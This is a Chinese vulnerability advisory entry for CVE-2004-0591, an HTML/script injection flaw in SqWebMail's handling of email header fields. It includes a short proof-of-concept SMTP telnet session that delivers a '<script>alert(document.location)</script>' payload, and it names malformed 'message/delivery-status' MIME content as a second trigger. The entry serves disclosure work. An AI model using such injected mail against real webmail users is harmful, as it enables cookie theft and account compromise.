SqWebMail Email头字段HTML注入漏洞 CVE-2004-0591 CNNVD-200408-078

6.8 AV AC AU C I A
发布: 2004-08-06
修订: 2017-07-11

SqWebMail是一款基于WEB的邮件系统。 SqWebMail不正确过滤用户提供的EMAIL头字符串,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得敏感信息。 攻击者发送的一个EMAIL消息如果在头字段包含类似如下的HTML代码: \"<script>alert(document.location)</script>\": ashanti@dns:~$ telnet localhost 25 Trying x.x.x.x... Connected to x.x.x.x. Escape character is \'\'^]\'\'. 220 x.x.x.x ESMTP helo foo 250 x.x.x.x mail from:<test test com> 250 ok rcpt to:<user mediaservice net> 250 ok data 354 go ahead <script>alert(document.location)</script> . [...] 当目标用户查看时可导致恶意脚本代码在用户浏览器上执行,泄露基于验证的COOKIE等信息。 另外攻击者也可以发送MIME Content-Type字段中设置畸形内容的\"message/delivery-status\",也可能触发漏洞。

0%
当前有3条漏洞利用/PoC
当前有1条受影响产品信息